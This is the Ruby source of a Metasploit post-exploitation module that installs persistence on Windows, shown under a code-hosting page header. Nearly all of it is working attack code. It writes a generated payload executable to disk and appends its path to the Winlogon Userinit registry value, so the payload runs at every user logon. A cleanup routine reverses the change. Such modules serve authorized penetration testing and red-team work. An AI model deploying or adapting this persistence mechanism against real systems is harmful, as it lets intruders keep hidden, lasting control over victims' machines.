h00die
86 lines
3.3 KiB
Ruby
86 lines
3.3 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Local
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Post::Windows::Registry
|
|
include Msf::Post::File
|
|
include Msf::Exploit::EXE
|
|
include Msf::Exploit::Powershell
|
|
include Msf::Exploit::Local::Persistence
|
|
prepend Msf::Exploit::Remote::AutoCheck
|
|
|
|
def initialize(info = {})
|
|
super(
|
|
update_info(
|
|
info,
|
|
'Name' => 'Windows Registry Persistence via Userinit',
|
|
'Description' => %q{
|
|
This module will install a payload that is executed during user logon.
|
|
It writes a payload executable to disk and modifies the Userinit registry value
|
|
in "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" to append the
|
|
payload path, causing it to execute when any user logs in.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' => [
|
|
'joel @ ndepthsecurity',
|
|
'h00die',
|
|
],
|
|
'Platform' => [ 'win' ],
|
|
'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
|
|
'SessionTypes' => [ 'meterpreter', 'shell' ],
|
|
'Targets' => [
|
|
[ 'Automatic', {} ]
|
|
],
|
|
'References' => [
|
|
['ATT&CK', Mitre::Attack::Technique::T1112_MODIFY_REGISTRY],
|
|
['URL', 'https://hadess.io/the-art-of-windows-persistence/']
|
|
],
|
|
'DefaultTarget' => 0,
|
|
'DisclosureDate' => '2015-07-01',
|
|
'Notes' => {
|
|
'Reliability' => [EVENT_DEPENDENT, REPEATABLE_SESSION],
|
|
'Stability' => [CRASH_SAFE],
|
|
'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
|
|
}
|
|
)
|
|
)
|
|
|
|
register_options([
|
|
OptString.new('PAYLOAD_NAME', [false, 'Name of payload file to write. Random string as default.']),
|
|
])
|
|
end
|
|
|
|
def regkey
|
|
'HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon'
|
|
end
|
|
|
|
def check
|
|
print_warning('Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.') if datastore['WritableDir'].start_with?('%TEMP%') # check the original value
|
|
return CheckCode::Safe("#{writable_dir} doesnt exist") unless exists?(writable_dir)
|
|
|
|
return Msf::Exploit::CheckCode::Safe("Unable to read registry path #{regkey} with key Userinit") if registry_getvaldata(regkey, 'Userinit').nil?
|
|
|
|
Msf::Exploit::CheckCode::Vulnerable('Registry likely exploitable')
|
|
end
|
|
|
|
def install_persistence
|
|
payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(6..13)))
|
|
payload_exe = generate_payload_exe
|
|
payload_pathname = writable_dir + '\\' + payload_name + '.exe'
|
|
vprint_good("Writing payload to #{payload_pathname}")
|
|
fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe)
|
|
|
|
old_value = registry_getvaldata(regkey, 'Userinit')
|
|
new_value = (old_value.split(',') + [payload_pathname]).join(',')
|
|
vprint_status("Updating '#{old_value}' to '#{new_value}'")
|
|
registry_setvaldata(regkey, 'Userinit', new_value, 'REG_SZ')
|
|
escaped_old_value = old_value.gsub('\\', '\\\\')
|
|
@clean_up_rc = %(execute -f cmd.exe -a "/c reg add \\\"#{regkey}\\\" /v Userinit /t REG_SZ /d \\\"#{escaped_old_value}\\\" /f" -H\n)
|
|
@clean_up_rc << "rm #{payload_pathname.gsub('\\', '/')}\n"
|
|
end
|
|
end
|